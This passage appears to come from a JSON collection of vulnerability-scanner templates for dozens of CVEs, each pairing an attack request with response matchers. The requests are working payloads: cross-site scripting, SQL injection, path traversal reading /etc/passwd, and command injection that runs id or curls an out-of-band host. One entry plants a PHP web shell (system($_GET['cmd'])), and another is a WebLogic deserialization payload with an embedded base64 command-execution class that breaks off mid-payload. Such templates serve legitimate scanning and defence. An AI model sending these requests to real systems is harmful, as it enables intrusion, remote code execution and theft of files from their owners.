/wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\"onmouseover=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain)/\">","Post Grid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24316","info":{"name":"WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(/{{randstr}}/)</script>","Sorry, no posts matched your criteria."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24987","info":{"name":"WordPress Super Socializer <7.13.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"facebook_urls\":[[\"<img src=x onerror=alert(document.domain)>\"]]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36580","info":{"name":"IceWarp Mail Server - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password=&_a%5bsignup%5d=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-24409","info":{"name":"Prismatic < 2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"Leave A Review?\")","contains(body_2, \"onanimationend=alert(document.domain)\")"],"condition":"and"}]}]},{"id":"CVE-2021-27561","info":{"name":"YeaLink DM 3.6.0.20 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid","gid","groups"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-39152","info":{"name":"XStream <1.4.18 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs>GBK</cs>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2021-25033","info":{"name":"Noptin < 1.6.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-45422","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\"><input type=","value: \"><script>alert(document.domain)</script>)<br>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31589","info":{"name":"BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","bomgar"],"case-insensitive":true,"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37538","info":{"name":"PrestaShop SmartBlog <4.0.6- SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c5fe25896e49ddfe996db7508cf00534"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36356","info":{"name":"Kramer VIAware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nradioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php\n","GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'\")}' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-41266","info":{"name":"MinIO Operator Console Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /api/v1/login/oauth2/auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"code\":\"test\",\"state\":\"test\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sessionId"]},{"type":"word","part":"header","words":["token"]},{"type":"status","status":[201,200],"condition":"or"}]}]},{"id":"CVE-2021-33851","info":{"name":"WordPress Customize Login Image <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=\n","GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(header_4, \"text/html\")","contains(body_4, \"Go to <script>alert(document.domain)</script>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-40875","info":{"name":"Gurock TestRail Application files.md5 Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files.md5","{{BaseURL}}/testrail/files.md5"],"stop-at-first-match":true,"max-size":1000,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["app/arguments/admin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27909","info":{"name":"Mautic <3.3.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert(document.domain);var ok='","mauticBasePath"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44077","info":{"name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/RestAPI/ImportTechnicians"],"matchers-condition":"and","matchers":[{"type":"word","words":["<form name=\"ImportTechnicians\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37216","info":{"name":"QSAN Storage Manager <3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http_header.php"],"headers":{"X-Trigger-XSS":"<script>alert(1)</script>"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(header), 'x-xss-protection')"]},{"type":"word","part":"body","words":["\"HTTP_X_TRIGGER_XSS\":\"<script>alert(1)</script>\""]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-20167","info":{"name":"Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun","severity":"high"},"requests":[{"raw":["POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1\nHost: {{Hostname}}\n\n\"name\":\"';$(curl {{interactsh-url}});'\",\n\"email\":\"a@b.c\"\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-28073","info":{"name":"Ntopng Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css","{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css"],"matchers-condition":"and","matchers":[{"type":"word","words":["application/json"],"part":"header"},{"type":"word","words":["\"results\":","\"name\":","\"tab\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24155","info":{"name":"WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921\n\n-----------------------------204200867127808062083805313921\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho \"CVE-2021-24155\";\n\n?>\n\n-----------------------------204200867127808062083805313921--\n","GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_3, '{\\\"success\\\":1}')","contains(body_4, 'CVE-2021-24155')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["BG_BACKUP_STRINGS = {\"nonce\":\"([0-9a-zA-Z]+)\"};"],"internal":true}]}]},{"id":"CVE-2021-27850","info":{"name":"Apache Tapestry - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /assets/app/something/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/java"]},{"type":"word","part":"body","words":["configuration","webtools"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\\/assets\\/app\\/([a-z0-9]+)\\/services\\/AppMod"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-34640","info":{"name":"WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET //wp-admin/options-general.php/\"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3374","info":{"name":"Rstudio Shiny Server <1.5.16 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2f/","{{BaseURL}}/sample-apps/hello/%2f/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /"]},{"type":"regex","part":"body","regex":["[A-Za-z].*\\.R"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41569","info":{"name":"SAS/Internet 9.4 1520 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2001-0537","info":{"name":"Cisco IOS HTTP Configuration - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/level/16/exec/show/config/CR"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["service config","Switch","default-gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13101","info":{"name":"D-Link DIR-600M - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wan.htm HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/PPPoE/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14322","info":{"name":"Pallets Werkzeug <0.15.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/web/static/c:/windows/win.ini","{{BaseURL}}/base/static/c:/windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12461","info":{"name":"WebPort 1.19.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain);</script><script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7543","info":{"name":"KindEditor 4.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/kindeditor/php/demo.php","{{BaseURL}}/php/demo.php"],"body":"content1=</script><script>alert(document.domain)</script>&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-14223","info":{"name":"Alfresco Share - Open Redirect","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/share/page/dologin"],"body":"success=%2Fshare%2Fpage%2F&failure=:\\\\interact.sh&username=baduser&password=badpass\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"]}]}]},{"id":"CVE-2019-16313","info":{"name":"ifw8 Router ROM v4.31 - Credential Discovery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/action/usermanager.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"],"part":"body"}]}]},{"id":"CVE-2019-18665","info":{"name":"DOMOS 5.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7609","info":{"name":"Kibana Timelion - Arbitrary Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/timelion/run"],"body":"{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}","headers":{"Content-Type":"application/json; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["seriesList"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7255","info":{"name":"Linear eMerge E3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Template : <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10475","info":{"name":"Jenkins build-metrics 1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7254","info":{"name":"eMerge E3 1.00-06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?c=../../../../../../etc/passwd%00","{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2729","info":{"name":"Oracle WebLogic Server Administration Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void 